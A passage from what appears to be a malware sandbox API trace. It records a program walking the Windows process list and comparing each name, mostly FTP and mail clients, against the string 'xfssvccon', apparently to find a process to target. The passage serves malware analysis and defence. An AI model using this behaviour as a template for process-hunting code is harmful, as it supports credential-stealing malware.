(lpFirst="latitude qualifications.exe", lpSrch="xfssvccon") returned 0x0 [0093.958] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0093.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0093.959] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x3566a98 [0093.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x3566a98, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0093.959] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0093.959] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="xfssvccon") returned 0x0 [0093.959] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0093.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.960] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3568cb8 [0093.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3568cb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0093.960] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0093.960] StrStrIA (lpFirst="powell_jane.exe", lpSrch="xfssvccon") returned 0x0 [0093.960] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0093.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0093.961] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35697c8 [0093.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x35697c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0093.962] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0093.962] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="xfssvccon") returned 0x0 [0093.962] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0093.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0093.963] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3568ca0 [0093.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3568ca0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0093.963] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0093.963] StrStrIA (lpFirst="gainedshape.exe", lpSrch="xfssvccon") returned 0x0 [0093.963] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0093.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.964] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x35697e8 [0093.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x35697e8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0093.964] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0093.964] StrStrIA (lpFirst="opens-versions.exe", lpSrch="xfssvccon") returned 0x0 [0093.964] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0093.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0093.997] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x3566ac0 [0093.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x3566ac0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0093.997] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0093.997] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="xfssvccon") returned 0x0 [0093.997] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0093.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0093.998] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568b80 [0093.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0093.998] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0093.998] StrStrIA (lpFirst="3dftp.exe", lpSrch="xfssvccon") returned 0x0 [0093.998] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0093.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0093.999] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569548 [0093.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3569548, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0094.000] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0094.000] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="xfssvccon") returned 0x0 [0094.000] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0094.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.001] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568bb0 [0094.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568bb0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0094.001] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0094.001] StrStrIA (lpFirst="alftp.exe", lpSrch="xfssvccon") returned 0x0 [0094.001] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0094.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.003] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568cd0 [0094.003] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3568cd0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0094.003] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0094.003] StrStrIA (lpFirst="barca.exe", lpSrch="xfssvccon") returned 0x0 [0094.003] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0094.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.004] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568a48 [0094.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3568a48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0094.004] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0094.004] StrStrIA (lpFirst="bitkinex.exe", lpSrch="xfssvccon") returned 0x0 [0094.004] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0094.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.005] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568a78 [0094.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0094.005] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0094.005] StrStrIA (lpFirst="coreftp.exe", lpSrch="xfssvccon") returned 0x0 [0094.005] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0094.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.007] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35478c8 [0094.007] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x35478c8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0094.007] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0094.007] StrStrIA (lpFirst="far.exe", lpSrch="xfssvccon") returned 0x0 [0094.007] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0094.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.008] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568a90 [0094.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3568a90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0094.008] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0094.008] StrStrIA (lpFirst="filezilla.exe", lpSrch="xfssvccon") returned 0x0 [0094.008] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0094.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.010] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568b98 [0094.010] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3568b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.010] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0094.010] StrStrIA (lpFirst="flashfxp.exe", lpSrch="xfssvccon") returned 0x0 [0094.010] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0094.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.011] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568b20 [0094.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3568b20, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0094.011] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0094.011] StrStrIA (lpFirst="fling.exe", lpSrch="xfssvccon") returned 0x0 [0094.011] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0094.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0094.013] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3569568 [0094.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3569568, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0094.013] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0094.013] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="xfssvccon") returned 0x0 [0094.013] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0094.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0094.014] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x35695a8 [0094.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x35695a8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0094.014] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0094.014] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="xfssvccon") returned 0x0 [0094.014] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0094.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0094.016] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35478f8 [0094.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x35478f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0094.016] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0094.016] StrStrIA (lpFirst="icq.exe", lpSrch="xfssvccon") returned 0x0 [0094.016] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0094.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0094.018] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3568bf8 [0094.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568bf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0094.018] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0094.018] StrStrIA (lpFirst="leechftp.exe", lpSrch="xfssvccon") returned 0x0 [0094.018] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0094.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0094.019] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3568c28 [0094.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x3568c28, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0094.019] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0094.019] StrStrIA (lpFirst="ncftp.exe", lpSrch="xfssvccon") returned 0x0 [0094.019] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0094.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0094.021] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3568c40 [0094.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x3568c40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0094.021] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0094.021] StrStrIA (lpFirst="notepad.exe", lpSrch="xfssvccon") returned 0x0 [0094.021] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0094.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0094.022] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3568c58 [0094.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, 